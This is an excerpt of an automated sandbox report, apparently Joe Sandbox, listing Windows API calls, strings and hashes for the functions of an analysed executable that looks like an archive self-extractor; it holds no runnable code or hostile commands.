                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E1C36E
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E1C38C
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E1C39C
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E1C3B8
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E1C3D4
                                                                                                    • _swprintf.LIBCMT ref: 00E1C404
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00E1C417
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E1C41E
                                                                                                    • _swprintf.LIBCMT ref: 00E1C477
                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00E1C48A
                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00E1C4A7
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00E1C4C7
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E1C4D7
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E1C4F1
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E1C509
                                                                                                    • _swprintf.LIBCMT ref: 00E1C535
                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00E1C548
                                                                                                    • _swprintf.LIBCMT ref: 00E1C59C
                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00E1C5AF
                                                                                                      • Part of subcall function 00E1AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E1AF35
                                                                                                      • Part of subcall function 00E1AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00E3E72C,?,?), ref: 00E1AF84
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                    • String ID: %s %s$%s %s %s$P$REPLACEFILEDLG
                                                                                                    • API String ID: 797121971-530609767
                                                                                                    • Opcode ID: 61b76a5b105888ad3dc68cd350b3f5863b516028199116c50ff31a692f2a57c6
                                                                                                    • Instruction ID: 14f4aa4abdb0ff0cb1e491cd64567cb88bce1272a20697bbb45b1312df671593
                                                                                                    • Opcode Fuzzy Hash: 61b76a5b105888ad3dc68cd350b3f5863b516028199116c50ff31a692f2a57c6
                                                                                                    • Instruction Fuzzy Hash: 8591C4B2148348BFD2219BB0DC49FFB7BECEB4A704F045819F745E2091D775AA488B62
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E06FAA
                                                                                                    • _wcslen.LIBCMT ref: 00E07013
                                                                                                    • _wcslen.LIBCMT ref: 00E07084
                                                                                                      • Part of subcall function 00E07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E07AAB
                                                                                                      • Part of subcall function 00E07A9C: GetLastError.KERNEL32 ref: 00E07AF1
                                                                                                      • Part of subcall function 00E07A9C: CloseHandle.KERNEL32(?), ref: 00E07B00
                                                                                                      • Part of subcall function 00E0A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641,000000FF), ref: 00E0A1F1
                                                                                                      • Part of subcall function 00E0A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E0977F,?,?,00E095CF,?,?,?,?,?,00E32641), ref: 00E0A21F
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00E07139
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E07155
                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00E07298
                                                                                                      • Part of subcall function 00E09DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E073BC,?,?,?,00000000), ref: 00E09DBC
                                                                                                      • Part of subcall function 00E09DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00E09E70
                                                                                                      • Part of subcall function 00E09620: CloseHandle.KERNELBASE(000000FF,?,?,00E095D6,?,?,?,?,?,00E32641,000000FF), ref: 00E0963B
                                                                                                      • Part of subcall function 00E0A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A501
                                                                                                      • Part of subcall function 00E0A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A532
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                    • Opcode ID: 60f6038df4e1292d37903a749d2a5f996f9b1d3ad0ed33b3f4f48465f92c39fd
                                                                                                    • Instruction ID: 57c45f559a649b27a2abf1536a8d9a35f4a0bbd9af8c28acbdb9cd4c9e11aab6
                                                                                                    • Opcode Fuzzy Hash: 60f6038df4e1292d37903a749d2a5f996f9b1d3ad0ed33b3f4f48465f92c39fd
                                                                                                    • Instruction Fuzzy Hash: C9C1D271D04248AAEB24DB74DC85FEEB7A8AF04304F00555AF996F71C2D774BAC88B61
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: __floor_pentium4
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                    • Opcode ID: 62538bbcc372dbebf0983362f3c84e5f57694333fd78baae75a510c98ac25c71
                                                                                                    • Instruction ID: 13e5487168eaee4f4b037ed383dd0b1626fcfef004d40e51ac6622eef56fc1b2
                                                                                                    • Opcode Fuzzy Hash: 62538bbcc372dbebf0983362f3c84e5f57694333fd78baae75a510c98ac25c71
                                                                                                    • Instruction Fuzzy Hash: E8C21971E086388FDB29CE28AD407EAB7B5EB84305F1551EAD54EF7240E775AE818F40
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog_swprintf
                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                    • API String ID: 146138363-3282847064
                                                                                                    • Opcode ID: 707e627d1e62e8b70eb0aedac28f84b336fce4dad4ee3a1b7e5fd718aabafd63
                                                                                                    • Instruction ID: d81dadca56cedc5e8af6e49c30ac0ec49dfb76311a36e19074c87fa240df252b
                                                                                                    • Opcode Fuzzy Hash: 707e627d1e62e8b70eb0aedac28f84b336fce4dad4ee3a1b7e5fd718aabafd63
                                                                                                    • Instruction Fuzzy Hash: 7F32B3715103849BDB18DF74C895AE93BE9AF14304F08557DFD8AAB2C2DB749AC9CB20
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E02874
                                                                                                    • _strlen.LIBCMT ref: 00E02E3F
                                                                                                      • Part of subcall function 00E102BA: __EH_prolog.LIBCMT ref: 00E102BF
                                                                                                      • Part of subcall function 00E11B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E0BAE9,00000000,?,?,?,00010420), ref: 00E11BA0
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E02F91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                    • String ID: CMT
                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                    • Opcode ID: 111d6310f0c581f8abdf0771ba21e26e1992427b94248fe5398ae53beee7b4b1
                                                                                                    • Instruction ID: 15e8d2fecc3e1e1067d4ddd28fb0b793e9a6cd142f5e47b11fd8915a5380ffbf
                                                                                                    • Opcode Fuzzy Hash: 111d6310f0c581f8abdf0771ba21e26e1992427b94248fe5398ae53beee7b4b1
                                                                                                    • Instruction Fuzzy Hash: 386225716002448FDB19DF34C88A6EA3BE1EF54304F18557EED9AAB2C2DB7599C5CB20
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(80000000,,0000001C,00E1E7DD,00000000,?,?,?,?,?,?,?,00E1E5E8,00000004,00E61CEC,00E1E86D), ref: 00E1E6B4
                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00E1E5E8,00000004,00E61CEC,00E1E86D), ref: 00E1E6CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                    • String ID: D$
                                                                                                    • API String ID: 401686933-250975860
                                                                                                    • Opcode ID: 524e1766fdb506fcd02d5130fff078f3e03003d03e1f914186be9f05ef4eed9a
                                                                                                    • Instruction ID: ca3e9a7354925f68a956f82ebef5be5454a09a6eba3bb98053d6a90ba0309e16
                                                                                                    • Opcode Fuzzy Hash: 524e1766fdb506fcd02d5130fff078f3e03003d03e1f914186be9f05ef4eed9a
                                                                                                    • Instruction Fuzzy Hash: 2501F7326001096BDB14DE29DC09BED7BAAAFC4328F0CC121FD19E7250D738D9458680
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E1F844
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00E1F910
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E1F930
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00E1F93A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 254469556-0
                                                                                                    • Opcode ID: d663734b86c134a9f40a1b1c55ba3f9ce223303f5b257fcdb12769bd22f7f6ac
                                                                                                    • Instruction ID: e284f69ff286bd98b08f3228958cb7d13aaee94b56f4c13b8b86b5ed1b7d0d89
                                                                                                    • Opcode Fuzzy Hash: d663734b86c134a9f40a1b1c55ba3f9ce223303f5b257fcdb12769bd22f7f6ac
                                                                                                    • Instruction Fuzzy Hash: 173107B5D0521D9BDB20DFA4D989BCCBBB8AF08304F1040AAE40DAB250EB759A858F44
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00E28FB5
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00E28FBF
                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00E28FCC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: 40416f8d0eaa80f632425de81445789b788f7b247c86f1b8b70fdaba6853c214
                                                                                                    • Instruction ID: 477dd34d66a0d0b3baebd4f69e92fd7d2fc1b8605b3b5acec29f4759c9d387f8
                                                                                                    • Opcode Fuzzy Hash: 40416f8d0eaa80f632425de81445789b788f7b247c86f1b8b70fdaba6853c214
                                                                                                    • Instruction Fuzzy Hash: E931B77590122C9BCB21DF65DD89BDDBBB4AF08310F5052EAE41CA6250EB709F858F44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                    • Instruction ID: 960b42b3cf75e468cd1a4443b7b2a9b4f553b413aa64fb6b77ecec49b483d33a
                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                    • Instruction Fuzzy Hash: 48022C71E042299FDF18CFA9D9806ADB7F1EF48314F25916AE919F7380D730AA41CB90
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E1AF35
                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,00E3E72C,?,?), ref: 00E1AF84
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                    • String ID:
                                                                                                    • API String ID: 2169056816-0
                                                                                                    • Opcode ID: a748e8a2080aac90c8f110eec26ac844d4593de930a02512fb066cd5f53a71b5
                                                                                                    • Instruction ID: a7de146f8a6c4a210651ae19c96732c1bc191194dca05f1b74ce5f03e05d7836
                                                                                                    • Opcode Fuzzy Hash: a748e8a2080aac90c8f110eec26ac844d4593de930a02512fb066cd5f53a71b5
                                                                                                    • Instruction Fuzzy Hash: 4501217A200308AED7109F75DC49F9A7BBCEF49711F505422FA05F7290D3709969CBA5
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00E06DDF,00000000,00000400), ref: 00E06C74
                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00E06C95
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 3479602957-0
                                                                                                    • Opcode ID: 866ed21b9822de925d0e392bab60ad585d2f718d8c60643a500cd76ffc1d06fb
                                                                                                    • Instruction ID: 91b95aa4e5fefa1ad580f5cdb11d2994d6e38d506b7f76c417ff1e6e040c1a78
                                                                                                    • Opcode Fuzzy Hash: 866ed21b9822de925d0e392bab60ad585d2f718d8c60643a500cd76ffc1d06fb
                                                                                                    • Instruction Fuzzy Hash: A8D0A730344300BFFA040B324D4AF1A7F99BF40B45F14C0047340F40E0C6748464AA14
                                                                                                    APIs
                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E319EF,?,?,00000008,?,?,00E3168F,00000000), ref: 00E31C21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise
                                                                                                    • String ID:
                                                                                                    • API String ID: 3997070919-0
                                                                                                    • Opcode ID: fa4ff86cf443ffbeb5b7651afe294e42ea6f77774b1cc904c30f3f5640f24de9
                                                                                                    • Instruction ID: 9b29ff9cd2bbdf6d7f256cb662c5a282b943be52108faca47fe493aa94eac794
                                                                                                    • Opcode Fuzzy Hash: fa4ff86cf443ffbeb5b7651afe294e42ea6f77774b1cc904c30f3f5640f24de9
                                                                                                    • Instruction Fuzzy Hash: B9B10731610608DFD719CF28C48ABA5BFA0FF45369F29969CE899DF2A1C335D991CB40
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E1F66A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 2325560087-0
                                                                                                    • Opcode ID: 5faeed5dc6ec84dba653dfa0df11ab5ec2ba6161d7ef84a1925520fec9c5cb50
                                                                                                    • Instruction ID: f0164f41ab536511c95c075f590f954b391377cc88e532022ce022c0a3e03ec3
                                                                                                    • Opcode Fuzzy Hash: 5faeed5dc6ec84dba653dfa0df11ab5ec2ba6161d7ef84a1925520fec9c5cb50
                                                                                                    • Instruction Fuzzy Hash: FE51AFB19106098FEB29CF59E8857EABBF0FB48358F24947AD411FB390D3749944CB90
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00E0B16B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889659487-0
                                                                                                    • Opcode ID: b6e720d9b8d41b34b2bfef87198ef6567db7ce1f410f642ca77a9ff22794306e
                                                                                                    • Instruction ID: 7e879775c086908fb94dc41ab758ad8298cad068b11e4bdeeac0953563c3eed5
                                                                                                    • Opcode Fuzzy Hash: b6e720d9b8d41b34b2bfef87198ef6567db7ce1f410f642ca77a9ff22794306e
                                                                                                    • Instruction Fuzzy Hash: 7BF03AB8E002088FDB28CB29ED966D977F1FB99359F104295D515B37D0C3B0ADC98E60
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 0-4203073231
                                                                                                    • Opcode ID: 3b568b95a2d4a151c7cf4db419d32fc3a6a4174e4e5f0ab58934fd068e8628f2
                                                                                                    • Instruction ID: 72f275e9aee27a5cacbf554541631c8bec4d85547c1c39e9fab4db70b31269e1
                                                                                                    • Opcode Fuzzy Hash: 3b568b95a2d4a151c7cf4db419d32fc3a6a4174e4e5f0ab58934fd068e8628f2
                                                                                                    • Instruction Fuzzy Hash: 73C149729183418FC354CF29D880A5AFBE2BFC8308F15892EE998D7311D734E945CB96
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00E1F3A5), ref: 00E1F9DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 12bd4bfeb3e3afe99236884085e27d6f5fd342b7242616aa8511a14d07c28517
                                                                                                    • Instruction ID: 68d55e4e678744e8430b3a716fdcb484f3baef9adb2f9526ff574f5672ce55cc
                                                                                                    • Opcode Fuzzy Hash: 12bd4bfeb3e3afe99236884085e27d6f5fd342b7242616aa8511a14d07c28517
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: db795c305369535929092fa17570211f2554ec6ab294a22134ce29ad4a8555b0
                                                                                                    • Instruction ID: 9962b88b705370636a2e8f2f8b706c0a053a05607619dd2cd169884336300379
                                                                                                    • Opcode Fuzzy Hash: db795c305369535929092fa17570211f2554ec6ab294a22134ce29ad4a8555b0
                                                                                                    • Instruction Fuzzy Hash: A6A011302022008F83008F32AE0CA0E3AAAAB002C2308002AA208E0020EAA080A8AB00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                                    • Instruction ID: 3419aad67b9c046115e21816f11caa1204f039d6b951d643db1bb3e23ff6c44c
                                                                                                    • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                                    • Instruction Fuzzy Hash: 4462C6716047849FCB29CF28C4906F9BBE1BF95304F08996DE8EA9B346D734E985CB11
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                                                    • Instruction ID: 6011169a49cc0a025cbc43f87f9d600dd5e25f5edd4ffe27954d9d9ac65d1078
                                                                                                    • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                                                    • Instruction Fuzzy Hash: 3862D4716083498FCB19CF28C8805E9BBF1BF99704F18996DE8DA9B346D730E985CB15
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00E0E30E
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                      • Part of subcall function 00E11DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00E41030,?,00E0D928,00000000,?,00000050,00E41030), ref: 00E11DC4
                                                                                                    • _strlen.LIBCMT ref: 00E0E32F
                                                                                                    • SetDlgItemTextW.USER32(?,00E3E274,?), ref: 00E0E38F
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E0E3C9
                                                                                                    • GetClientRect.USER32(?,?), ref: 00E0E3D5
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00E0E475
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E0E4A2
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E0E4DB
                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00E0E4E3
                                                                                                    • GetWindow.USER32(?,00000005), ref: 00E0E4EE
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00E0E51B
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00E0E58D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                    • String ID: $%s:$CAPTION$d$t
                                                                                                    • API String ID: 2407758923-369353836
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00E2CB66
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C71E
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C730
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C742
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C754
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C766
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C778
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C78A
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C79C
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7AE
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7C0
